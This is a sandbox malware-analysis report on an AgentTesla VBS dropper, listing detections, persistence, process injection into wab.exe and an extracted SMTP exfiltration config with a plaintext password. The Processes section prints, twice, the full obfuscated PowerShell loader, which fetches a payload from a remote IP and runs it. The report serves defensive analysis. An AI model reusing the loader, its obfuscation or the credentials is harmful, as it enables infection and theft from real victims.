Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
135s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
14/02/2024, 05:10
Static task
static1
Behavioral task
behavioral1
Sample
0dd16a7ff7018085b6018965f2b714918716ac6cdcd29a9edde6d2a177b9abe8.vbs
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
0dd16a7ff7018085b6018965f2b714918716ac6cdcd29a9edde6d2a177b9abe8.vbs
Resource
win10v2004-20231222-en
General
-
Target
0dd16a7ff7018085b6018965f2b714918716ac6cdcd29a9edde6d2a177b9abe8.vbs
-
Size
36KB
-
MD5
6fec200ae50301d9e7d4016d8c5bed1c
-
SHA1
056b1e615dab98aeecdc9adaa477d7b7a3d986d6
-
SHA256
0dd16a7ff7018085b6018965f2b714918716ac6cdcd29a9edde6d2a177b9abe8
-
SHA512
3985c6e2c3c87a5f79656ebe0557eed8abf9ca1aef8461390e389ad4bc89a2c4c1b329131a3100585eeee10ae6179aaf64e5b0ab8709e69a00fcd785f34e6177
-
SSDEEP
768:vUJfmkoEm3HXgwCIzBR8qcn7CbwC7cyzul+KaRB0e:cJaE0Q9Izoqce8C7cyzuw/X
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.if-rwanda.org - Port:
587 - Username:
[email protected] - Password:
IfrRfi2020 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Detect packed .NET executables. Mostly AgentTeslaV4. 2 IoCs
resource yara_rule behavioral1/memory/1908-44-0x00000000005C0000-0x0000000001622000-memory.dmp INDICATOR_EXE_Packed_GEN01 behavioral1/memory/1908-50-0x00000000005C0000-0x0000000000636000-memory.dmp INDICATOR_EXE_Packed_GEN01 -
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs
resource yara_rule behavioral1/memory/1908-44-0x00000000005C0000-0x0000000001622000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers behavioral1/memory/1908-50-0x00000000005C0000-0x0000000000636000-memory.dmp INDICATOR_SUSPICIOUS_Binary_References_Browsers -
Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion 2 IoCs
resource yara_rule behavioral1/memory/1908-44-0x00000000005C0000-0x0000000001622000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL behavioral1/memory/1908-50-0x00000000005C0000-0x0000000000636000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL -
Detects executables referencing Windows vault credential objects. Observed in infostealers 2 IoCs
resource yara_rule behavioral1/memory/1908-44-0x00000000005C0000-0x0000000001622000-memory.dmp INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID behavioral1/memory/1908-50-0x00000000005C0000-0x0000000000636000-memory.dmp INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID -
Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 2 IoCs
resource yara_rule behavioral1/memory/1908-44-0x00000000005C0000-0x0000000001622000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store behavioral1/memory/1908-50-0x00000000005C0000-0x0000000000636000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Confidential_Data_Store -
Detects executables referencing many email and collaboration clients. Observed in information stealers 2 IoCs
resource yara_rule behavioral1/memory/1908-44-0x00000000005C0000-0x0000000001622000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients behavioral1/memory/1908-50-0x00000000005C0000-0x0000000000636000-memory.dmp INDICATOR_SUSPICIOUS_EXE_References_Messaging_Clients -
Detects executables referencing many file transfer clients. Observed in information stealers 2 IoCs
resource yara_rule behavioral1/memory/1908-44-0x00000000005C0000-0x0000000001622000-memory.dmp INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients behavioral1/memory/1908-50-0x00000000005C0000-0x0000000000636000-memory.dmp INDICATOR_SUSPICIOUS_EXE_Referenfces_File_Transfer_Clients -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1603059206-2004189698-4139800220-1000\Software\Microsoft\Windows\CurrentVersion\Run\WvQpBa = "C:\\Users\\Admin\\AppData\\Roaming\\WvQpBa\\WvQpBa.exe" wab.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1908 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2812 powershell.exe 1908 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2812 set thread context of 1908 2812 powershell.exe 38 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2912 powershell.exe 2812 powershell.exe 1908 wab.exe 1908 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2812 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2912 powershell.exe Token: SeDebugPrivilege 2812 powershell.exe Token: SeDebugPrivilege 1908 wab.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2148 wrote to memory of 2912 2148 WScript.exe 28 PID 2148 wrote to memory of 2912 2148 WScript.exe 28 PID 2148 wrote to memory of 2912 2148 WScript.exe 28 PID 2912 wrote to memory of 2744 2912 powershell.exe 30 PID 2912 wrote to memory of 2744 2912 powershell.exe 30 PID 2912 wrote to memory of 2744 2912 powershell.exe 30 PID 2744 wrote to memory of 2672 2744 cmd.exe 31 PID 2744 wrote to memory of 2672 2744 cmd.exe 31 PID 2744 wrote to memory of 2672 2744 cmd.exe 31 PID 2912 wrote to memory of 2812 2912 powershell.exe 33 PID 2912 wrote to memory of 2812 2912 powershell.exe 33 PID 2912 wrote to memory of 2812 2912 powershell.exe 33 PID 2912 wrote to memory of 2812 2912 powershell.exe 33 PID 2812 wrote to memory of 888 2812 powershell.exe 34 PID 2812 wrote to memory of 888 2812 powershell.exe 34 PID 2812 wrote to memory of 888 2812 powershell.exe 34 PID 2812 wrote to memory of 888 2812 powershell.exe 34 PID 888 wrote to memory of 2552 888 cmd.exe 35 PID 888 wrote to memory of 2552 888 cmd.exe 35 PID 888 wrote to memory of 2552 888 cmd.exe 35 PID 888 wrote to memory of 2552 888 cmd.exe 35 PID 2812 wrote to memory of 1908 2812 powershell.exe 38 PID 2812 wrote to memory of 1908 2812 powershell.exe 38 PID 2812 wrote to memory of 1908 2812 powershell.exe 38 PID 2812 wrote to memory of 1908 2812 powershell.exe 38 PID 2812 wrote to memory of 1908 2812 powershell.exe 38 PID 2812 wrote to memory of 1908 2812 powershell.exe 38
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0dd16a7ff7018085b6018965f2b714918716ac6cdcd29a9edde6d2a177b9abe8.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ciphered;function Reaktio ($stik, $Episo, $Takst) {$stik.'Substring'( $Episo, $Takst);}Function Propanes9 ([String]$Pokerishly){For($Rangfors=5; $Rangfors -lt $Pokerishly.Length-$Grnseflade; $Rangfors+=6){$Subte131=Reaktio $Pokerishly $Rangfors $Grnseflade;$Spagn=$Spagn+$Subte131}$Spagn;}$Over = 'tzutil /l';$Monter = (cmd /c $Over);$Monter = [string]$Monter;$RangforsNDICE = $Monter.indexOf('1');$Grnseflade = Reaktio $Monter $RangforsNDICE 1;$Assimilabl220=Propanes9 'LandbhHjesttGaypotBoxbapKvadr:Fjern/Cowbo/Vejsv4Udhal6Armar. Bzer1Pseud8Sotte3Hales.Subli2Embro2Halsu2 Thuj.Predi1Hands9Klapj/saturMunsooa OutvgForelnOvereeSuffl. NaallduksepstudekFravr ';$Spagn01=Propanes9 'InterimegaleCatenxTumme ';$Nippeo = Propanes9 'Capac\Seksus CondySystesPositwStruno TangwAttra6 unde4Flame\ RebuWKursuiSkruenEngrad Slavoyockswbrutts StanPadipooAleipwMicroepluknrflemeSkiganh ToldeIodotlFormalBloms\TrombvUnscr1Topsw.Shaki0Jeble\ Giftp ErotoHenaawLerhoeOsmorrjohansBassehTrilleRemislUnsmilClock.Irrese CootxTungtefldes ';&($Spagn01) (Propanes9 'Chari$ NaboVSigteeShrugsTrindtremonaSpeci2Messk=Heter$KategeRoadwnBrabavtyref:sacbrwArbejienglenTorskdMeseniPapairAlkal ') ;&($Spagn01) (Propanes9 'Ydasu$SkattNIndlei Antep NuntpStapseRebidoExurb=Oilcl$MaddiVReforetranssSelvot RegiaGlorf2Elses+Ridse$DisteNEmissiBoylspPeriopAntibeFiguroDerma ') ;&($Spagn01) (Propanes9 'Insta$BogtrEBeskasSknhepParisaScrumgBehov Lovg=helio Passi(prepr( GlycgAfvaswNonremMetroiBlind oilfw FerniPanesnSnren3 Hait2Seque_OverspCheirrRockroStangc Aaree HoldsAimlesQuadr misop-PaintFEkspe CountPOutqurSljtgo expacDeligeInitisOverss TitaI NykudHeter=Runds$Spine{CuriaPHjemmISpiroDEndte} Mare)Dybde.ChiarCAngiooRelucmWidemm PeniaottetnBackidSportLPolypiTilennDrivgeImpro)Kanar Tupil-HydrosPartipHalvplDrifti DepotDamps Skrdd[ Intrc ReinhbeslaaFilmsrReneg]Decol3Frdse4 fora ');&($Spagn01) (Propanes9 'Berti$DespoRInteretryllg SucciStink Overb= Inex Privc$ LysbESkyttsAccelppediga InocgBelnn[ Slug$AkkliE Svars FordpSpalla AktigUnenv.SammecSalkaoSpirou ForenMusketAmphi-Menta2Centr] Rdbe ');&($Spagn01) (Propanes9 'stoun$VsentFUnpiteSagsks ButttFelthigange=Atlan(PropuTBackseKamersToldstClans-CelluP Prela BesotMonelhUdyde Leah$SammeN DaemidolkhpAerugpKarakeUnikuoAbsol)Islan Overs-DrageAIvithn Lfted Irre Stra(Girli[BispeIAdsprnkienatUdpegP StoltOpporrGaylo]Blind:Rnneb:EgnstsXlskoiCommezBirgieRepub Open-Sensae MineqKommu Stads8Bojar) Skls ') ;if ($Festi) {.$Nippeo $Regi;} else {;$Spagn00=Propanes9 'AflytSRelaptTarmpaHidkar HegntDegen-anskrBTarmeiTammot Frots OverTFlugerPermiaaysesn Sundsblyfrf bagaeBloksrOphth Junk-BordbSStrutoyankeuMolecrSuppocEnentePredi Nepal$ FunkAsenehsAntinsBeggaiModstm JoaniDomspl StrmaTyngdbAnkeslcoiff2Bigam2Media0Bjerg Carli-saurlD YndeeDragosFilret ZaphiFolmanNonfoa expot TrauivarmeoIndflnGulis Knibn$DefinVAfstaeKetchsFalcot ButtaOrigi2Skole ';&($Spagn01) (Propanes9 'Fndri$skampVPersoeNonbesPlanetSpunsaSolce2cambr=Hanga$BevgeeCanton Alsevvikar:KoordaAnodipStrokpExtradmoldaaKimentCardiaWhigg ') ;&($Spagn01) (Propanes9 'OversI ForfmPinscpKntreo Demir arbetResta-BasguMUnforoActindgenanuQuintlEksisepaakl DendrBFarceiVentutBrugss SwanTOutflrLidiaa ForpnUnmassSurrefRedese WillrOffer ') ;$Vesta2=$Vesta2+'\Computeri.San';while (-not $Udletover) {&($Spagn01) (Propanes9 'Rafle$UtricUImpredRumstlNongeeModalt Gramo BindvPatteeHurdlrStart=Indkr(ExterT SatseericssUnsartPrebb-SultaPWaneraSlevltOpteghMaskn Jagir$SportV FebreFastls ObvitNomina Info2 Land)Sigte ') ;&($Spagn01) $Spagn00;&($Spagn01) (Propanes9 'AmmerSMachit SupeaProterGlasstAkryl-cycloSTilsklForhaefibdoeAcrospDegra Gomor5dialo ');}&($Spagn01) (Propanes9 'Alder$LappePFortorLassooSkrumpVelfoaLuketnFatigetaisesKompl Pictu=sunfi TripoGHidhreFjeretCerem-mauthCEndeso VivanTradet MarkeIndern JerntApolo Adstr$TempeV ImpreBearbs MundtAflagaHjfre2Biono ');&($Spagn01) (Propanes9 'Retic$FrakkGGradsaHexacmdeltoaDosshcStere Rott=atten Samm[UninlSToileyNonpos InextMvstieBonehm Slus.FinikCInterokarosn UhelvRevole Unbur OpgatPlast] tilg: Dona:GrundFBuffarHovedoRougemRecipBKaffea Afbas VelyeKryst6Kvali4HaptoSbenzit TilbrChiroipaabenIotacgSkift( forf$UdbetPBarnerTvesyoAndsaptonefaHomilnRedake HoldsDeput)Firef ');&($Spagn01) (Propanes9 'Nonra$BonniS PhotpAktieaPhytogOvermnMedli2Taran Preco=Protr Naest[GableSFructySophisHomestDemageNonflmFirhn. MystTParfaeaadslxStrudtminid.ReallE Recan ConvcCephaoEvoludHavociNonexnAuspig Para] Lall:Guach:ApterABaskeSLedigCafkviIFribaIAfska.SvineGAfkoge posttAmatrSgalopt LintrlaaseiServinTirsdgUneup(Bilko$HulkoGJenfoa NonfmGennea OvercNonro)Archo ');&($Spagn01) (Propanes9 'Maris$LagdeOsulfum KallfSportaLemflvPoseknFodboe Fors= Pisk$LystrS Subap Honoafremsg DyppnNarko2 Frik.TerrasAcrenuHellibAntitsReutit NonprForkoi subpn TohagFinku(Overf3 Bomb2Stibi1Adams8Vngne1Kryds2Svejs, Carg1Cyani9Tacom1Tndrr3Tassi6Skgpe)forgu ');&($Spagn01) $Omfavne;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "tzutil /l"3⤵
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\system32\tzutil.exetzutil /l4⤵PID:2672
-
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$ciphered;function Reaktio ($stik, $Episo, $Takst) {$stik.'Substring'( $Episo, $Takst);}Function Propanes9 ([String]$Pokerishly){For($Rangfors=5; $Rangfors -lt $Pokerishly.Length-$Grnseflade; $Rangfors+=6){$Subte131=Reaktio $Pokerishly $Rangfors $Grnseflade;$Spagn=$Spagn+$Subte131}$Spagn;}$Over = 'tzutil /l';$Monter = (cmd /c $Over);$Monter = [string]$Monter;$RangforsNDICE = $Monter.indexOf('1');$Grnseflade = Reaktio $Monter $RangforsNDICE 1;$Assimilabl220=Propanes9 'LandbhHjesttGaypotBoxbapKvadr:Fjern/Cowbo/Vejsv4Udhal6Armar. Bzer1Pseud8Sotte3Hales.Subli2Embro2Halsu2 Thuj.Predi1Hands9Klapj/saturMunsooa OutvgForelnOvereeSuffl. NaallduksepstudekFravr ';$Spagn01=Propanes9 'InterimegaleCatenxTumme ';$Nippeo = Propanes9 'Capac\Seksus CondySystesPositwStruno TangwAttra6 unde4Flame\ RebuWKursuiSkruenEngrad Slavoyockswbrutts StanPadipooAleipwMicroepluknrflemeSkiganh ToldeIodotlFormalBloms\TrombvUnscr1Topsw.Shaki0Jeble\ Giftp ErotoHenaawLerhoeOsmorrjohansBassehTrilleRemislUnsmilClock.Irrese CootxTungtefldes ';&($Spagn01) (Propanes9 'Chari$ NaboVSigteeShrugsTrindtremonaSpeci2Messk=Heter$KategeRoadwnBrabavtyref:sacbrwArbejienglenTorskdMeseniPapairAlkal ') ;&($Spagn01) (Propanes9 'Ydasu$SkattNIndlei Antep NuntpStapseRebidoExurb=Oilcl$MaddiVReforetranssSelvot RegiaGlorf2Elses+Ridse$DisteNEmissiBoylspPeriopAntibeFiguroDerma ') ;&($Spagn01) (Propanes9 'Insta$BogtrEBeskasSknhepParisaScrumgBehov Lovg=helio Passi(prepr( GlycgAfvaswNonremMetroiBlind oilfw FerniPanesnSnren3 Hait2Seque_OverspCheirrRockroStangc Aaree HoldsAimlesQuadr misop-PaintFEkspe CountPOutqurSljtgo expacDeligeInitisOverss TitaI NykudHeter=Runds$Spine{CuriaPHjemmISpiroDEndte} Mare)Dybde.ChiarCAngiooRelucmWidemm PeniaottetnBackidSportLPolypiTilennDrivgeImpro)Kanar Tupil-HydrosPartipHalvplDrifti DepotDamps Skrdd[ Intrc ReinhbeslaaFilmsrReneg]Decol3Frdse4 fora ');&($Spagn01) (Propanes9 'Berti$DespoRInteretryllg SucciStink Overb= Inex Privc$ LysbESkyttsAccelppediga InocgBelnn[ Slug$AkkliE Svars FordpSpalla AktigUnenv.SammecSalkaoSpirou ForenMusketAmphi-Menta2Centr] Rdbe ');&($Spagn01) (Propanes9 'stoun$VsentFUnpiteSagsks ButttFelthigange=Atlan(PropuTBackseKamersToldstClans-CelluP Prela BesotMonelhUdyde Leah$SammeN DaemidolkhpAerugpKarakeUnikuoAbsol)Islan Overs-DrageAIvithn Lfted Irre Stra(Girli[BispeIAdsprnkienatUdpegP StoltOpporrGaylo]Blind:Rnneb:EgnstsXlskoiCommezBirgieRepub Open-Sensae MineqKommu Stads8Bojar) Skls ') ;if ($Festi) {.$Nippeo $Regi;} else {;$Spagn00=Propanes9 'AflytSRelaptTarmpaHidkar HegntDegen-anskrBTarmeiTammot Frots OverTFlugerPermiaaysesn Sundsblyfrf bagaeBloksrOphth Junk-BordbSStrutoyankeuMolecrSuppocEnentePredi Nepal$ FunkAsenehsAntinsBeggaiModstm JoaniDomspl StrmaTyngdbAnkeslcoiff2Bigam2Media0Bjerg Carli-saurlD YndeeDragosFilret ZaphiFolmanNonfoa expot TrauivarmeoIndflnGulis Knibn$DefinVAfstaeKetchsFalcot ButtaOrigi2Skole ';&($Spagn01) (Propanes9 'Fndri$skampVPersoeNonbesPlanetSpunsaSolce2cambr=Hanga$BevgeeCanton Alsevvikar:KoordaAnodipStrokpExtradmoldaaKimentCardiaWhigg ') ;&($Spagn01) (Propanes9 'OversI ForfmPinscpKntreo Demir arbetResta-BasguMUnforoActindgenanuQuintlEksisepaakl DendrBFarceiVentutBrugss SwanTOutflrLidiaa ForpnUnmassSurrefRedese WillrOffer ') ;$Vesta2=$Vesta2+'\Computeri.San';while (-not $Udletover) {&($Spagn01) (Propanes9 'Rafle$UtricUImpredRumstlNongeeModalt Gramo BindvPatteeHurdlrStart=Indkr(ExterT SatseericssUnsartPrebb-SultaPWaneraSlevltOpteghMaskn Jagir$SportV FebreFastls ObvitNomina Info2 Land)Sigte ') ;&($Spagn01) $Spagn00;&($Spagn01) (Propanes9 'AmmerSMachit SupeaProterGlasstAkryl-cycloSTilsklForhaefibdoeAcrospDegra Gomor5dialo ');}&($Spagn01) (Propanes9 'Alder$LappePFortorLassooSkrumpVelfoaLuketnFatigetaisesKompl Pictu=sunfi TripoGHidhreFjeretCerem-mauthCEndeso VivanTradet MarkeIndern JerntApolo Adstr$TempeV ImpreBearbs MundtAflagaHjfre2Biono ');&($Spagn01) (Propanes9 'Retic$FrakkGGradsaHexacmdeltoaDosshcStere Rott=atten Samm[UninlSToileyNonpos InextMvstieBonehm Slus.FinikCInterokarosn UhelvRevole Unbur OpgatPlast] tilg: Dona:GrundFBuffarHovedoRougemRecipBKaffea Afbas VelyeKryst6Kvali4HaptoSbenzit TilbrChiroipaabenIotacgSkift( forf$UdbetPBarnerTvesyoAndsaptonefaHomilnRedake HoldsDeput)Firef ');&($Spagn01) (Propanes9 'Nonra$BonniS PhotpAktieaPhytogOvermnMedli2Taran Preco=Protr Naest[GableSFructySophisHomestDemageNonflmFirhn. MystTParfaeaadslxStrudtminid.ReallE Recan ConvcCephaoEvoludHavociNonexnAuspig Para] Lall:Guach:ApterABaskeSLedigCafkviIFribaIAfska.SvineGAfkoge posttAmatrSgalopt LintrlaaseiServinTirsdgUneup(Bilko$HulkoGJenfoa NonfmGennea OvercNonro)Archo ');&($Spagn01) (Propanes9 'Maris$LagdeOsulfum KallfSportaLemflvPoseknFodboe Fors= Pisk$LystrS Subap Honoafremsg DyppnNarko2 Frik.TerrasAcrenuHellibAntitsReutit NonprForkoi subpn TohagFinku(Overf3 Bomb2Stibi1Adams8Vngne1Kryds2Svejs, Carg1Cyani9Tacom1Tndrr3Tassi6Skgpe)forgu ');&($Spagn01) $Omfavne;}"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "tzutil /l"4⤵
- Suspicious use of WriteProcessMemory
PID:888 -
C:\Windows\SysWOW64\tzutil.exetzutil /l5⤵PID:2552
-
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SX7D35Q36GECXMXHF2JY.temp
Filesize7KB
MD53843d30f42b278933cbc9ded3e900f81
SHA1fbd609adce1e0eeb7be643dbca254ca6775d5bc0
SHA25677f5e667d82bd4aa57bd5ba1f4b93aa8f942a19d14e2a9e209f1c15cd0e1a62b
SHA51214b05d5fdda5087d1577cef70c02db5caee6767784e63aeeea14d52faceb7a1e7bb9f12fee0ee239bf89f6abc9de1d889c17a26066ed50aaf79c98ae21e42419